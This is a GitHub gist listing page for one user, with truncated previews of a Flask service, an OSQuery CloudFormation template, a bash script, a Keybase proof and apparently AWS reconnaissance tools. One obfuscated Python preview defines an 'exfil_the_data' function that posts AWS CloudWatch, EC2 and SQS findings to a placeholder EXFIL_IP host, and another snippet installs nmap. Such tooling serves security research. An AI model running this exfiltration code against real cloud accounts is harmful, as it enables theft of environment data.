Andrew J Krug andrewkrug
andrewkrug
/ gist:7ecb91223d55a09dbcf358f68e6aac59
Last active
January 24, 2024 18:43
Identity Management for Everyone
andrewkrug
/ gist:314a19bc35ef08f35ea2b45518c3603b
Created
October 1, 2018 22:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask | |
| from flask_cors import CORS | |
| from flask_graphql import GraphQLView | |
| from flask_restful import Api | |
| from graphene import Schema | |
| from cis_profile_retrieval_service.common import get_config | |
| from cis_profile_retrieval_service.common import initialize_vault | |
| from cis_profile_retrieval_service.common import seed | |
| from cis_profile_retrieval_service.schema import Query |
andrewkrug
/ gist:93fd0b5749286c550416703800b63f9c
Created
August 21, 2018 17:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AWSTemplateFormatVersion: "2010-09-09" | |
| Description: "Template to create SSM Document to add OSQuery to a box." | |
| Resources: | |
| LinuxInstallOSQueryDocumentCommand: | |
| Type: AWS::SSM::Document | |
| Properties: | |
| Content: | |
| schemaVersion: "2.2" | |
| description: Run rpm to bootstrap OSQuery onto a system (requires internet gateway). | |
| mainSteps: |
andrewkrug
/ gist:e832da8970d50377e8cd0b1299f9e962
Created
August 21, 2018 15:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Make sure it runs as root | |
| [[ $UID == 0 || $EUID == 0 ]] || ( | |
| echo "Must be root!" | |
| exit 1 | |
| ) || exit 1 | |
| # Default variables | |
| INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id) |
andrewkrug
/ recon.py
Created
July 15, 2017 22:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import botocore | |
| import boto3 | |
| import json | |
| import os | |
| import time | |
| import uuid | |
| try: | |
| import urllib2 | |
| except: |
andrewkrug
/ gist:3d3012eb045d996e5ab4ee0d7cd5214c
Created
July 15, 2017 21:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (lambda __print, __g, __contextlib, __y: [[[[[[(lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: ('\nChecks to run if the environment is AWS.\n\nlogs:CreateLogGroup\nlogs:CreateLogStream\nlogs:PutLogEvents\nec2:DescribeTags\nsqs:ListQueues\nsqs:PutMessage\n\n', [[[[[[[[[[(lambda __after: (json.dumps(check_cloudwatch()), (exfil_the_data(json.dumps(check_cloudwatch())), (exfil_the_data(json.dumps(check_ec2())), (exfil_the_data(json.dumps(check_sqs())), __after())[1])[1])[1])[1] if (__name__ == '__main__') else __after())(lambda: None) for __g['exfil_the_data'], exfil_the_data.__name__ in [(lambda data: (lambda __l: [[[[[[(__print(__l['response']), None)[1] for __l['response'] in [(urllib2.urlopen(__l['req']))]][0] for __l['req'] in [(urllib2.Request('http://{EXFIL_IP}/'.format(EXFIL_IP=__l['exfil_ip']), data=__l['data'], headers=__l['headers']))]][0] for __l['headers'] in [({'Content-Type': 'application/json'})]][0] for __l['data'] in [(__l['data'].encode('utf- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get update -y | |
| apt-get install nmap -y |
andrewkrug
/ keybase.md
Created
June 7, 2017 15:58
I hereby claim:
- I am andrewkrug on github.
- I am andrewkrug (https://keybase.io/andrewkrug) on keybase.
- I have a public key ASBVwj9dJk9VZ0cPMEA4TLbWp-dqLAqDMNBdJhihDy0YqAo
To claim this, I am signing this object: